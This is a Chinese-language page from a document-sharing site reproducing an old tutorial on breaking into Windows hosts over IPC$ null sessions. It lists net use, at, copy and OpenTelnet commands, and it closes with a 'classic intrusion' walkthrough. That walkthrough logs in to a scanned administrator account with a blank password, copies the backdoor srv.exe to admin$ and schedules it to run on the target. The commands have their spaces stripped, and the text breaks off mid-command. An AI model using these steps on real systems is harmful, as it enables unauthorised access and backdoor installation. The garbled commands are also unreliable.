与远程主机建立空管连接

《与远程主机建立空管连接》由会员上传分享，免费在线阅读，更多相关内容在行业资料-天天文库。

1、与主机建立管连接（与远程主机建立空管连接）netuse\IP地址ipc$""/use:""（以管理员身份登录远程主机）netuse\IP地址ipc$"密码"/use:"Administrator"1)建立空连接:netuse\IPipc$""/user:""(一定要注意:这一行命令中包含了3个空格)2)建立非空连接:netuse\IPipc$"密码"/user:"用户名"(同样有3个空格)3)映射默认共享:netusez:\IPc$"密码"/user:"用户名"(即可将对方的c盘映射为自己的z盘，其他盘类推)如果已经和目标建立了ip

2、c$，则可以直接用IP+盘符+$访问,具体命令netusez:\IPc$4)删除一个ipc$连接netuse\IPipc$/del5)删除共享映射netusec:/del删除映射的c盘，其他盘类推netuse*/del删除全部,会有提示要求按y确认3查看远程主机的共享资源（但看不到默认共享）netview\IP 4查看本地主机的共享资源（可以看到本地的默认共享）netshare 5得到远程主机的用户名列表nbtstat-AIP 6得到本地主机的用户列表netuser 7查看远程主机的当前时间nettime\IP 8显示本地主机当前服务net

3、start 9启动/关闭本地服务netstart服务名/ynetstop服务名/y 10映射远程共享:netusez:\IPbaby此命令将共享名为baby的共享资源映射到z盘 11删除共享映射netusec:/del删除映射的c盘，其他盘类推6与主机建立管连接netuse*/del/y删除全部 12向远程主机复制文件copy路径srv.exe\IP共享目录名，如：copyccbirds.exe\*.*.*.*c即将当前目录下的文件复制到对方c盘内 13远程添加计划任务at\ip时间程序名，如：at\127.0.0.011:00lo

4、ve.exe注意：时间尽量使用24小时制；在系统默认搜索路径（比如system32/）下不用加路径，否则必须加全路径14开启远程主机的telnet这里要用到一个小程序：opentelnet.exe，各大下载站点都有，而且还需要满足四个要求： 1）目标开启了ipc$共享 2）你要拥有管理员密码和帐号 3）目标开启RemoteRegistry服务，用户就该ntlm认证 4）对WIN2K/XP有效，NT未经测试 命令格式：OpenTelnet.exe\serveraccountpswNTLM认证方式port 试例如下：c:>OpenTelnet.exe

5、*.*.*.*administrator""190 15激活用户/加入管理员组 1netuesraccount/active:yes 2netlocalgroupadministratorsaccount/add 16关闭远程主机的telnet 同样需要一个小程序：ResumeTelnet.exe 命令格式：ResumeTelnet.exe\serveraccountpsw 试例如下：c:>ResumeTelnet.exe\*.*.*.*administrator"" 17删除一个已建立的ipc$连接 netuse\IPipc$/del九经

6、典入侵模式这个入侵模式太经典了,大部分ipc教程都有介绍,我也就拿过来引用了,在此感谢原创作者!(不知道是哪位前辈)1.C:>netuse\127.0.0.1IPC$""/user:"admintitrators"这是用《流光》扫到的用户名是administrators，密码为"空"的IP地址(空口令?哇,运气好到家了)，如果是打算攻击的话，就可以用这样的命令来与127.0.0.1建立一个连接，因为密码为"空"，所以第一个引号处就不用输入，后面一个双引号里的是用户名，输入administrators，命令即可成功完成。复制之前务必用netview

7、\IP这个命令看一下对方的共享情况 2.C:>copysrv.exe\127.0.0.1admin$先复制srv.exe上去，在流光的Tools目录下就有（这里的$是指admin用户的c:winntsystem32，大家还可以使用c$、d$，意思是C盘与D盘，这看你要复制到什么地方去了）。 3.C:>nettime\127.0.0.1查查时间，发现127.0.0.1的当前时间是2002/3/19上午11:00，命令成功完成。 6与主机建立管连接4.C:>at\127.0.0.111:05srv.exe用at命令启动srv.exe吧

8、（这里设置的时间要比主机时间快，不然你怎么启动啊，呵呵！） 5.C:>nettime\12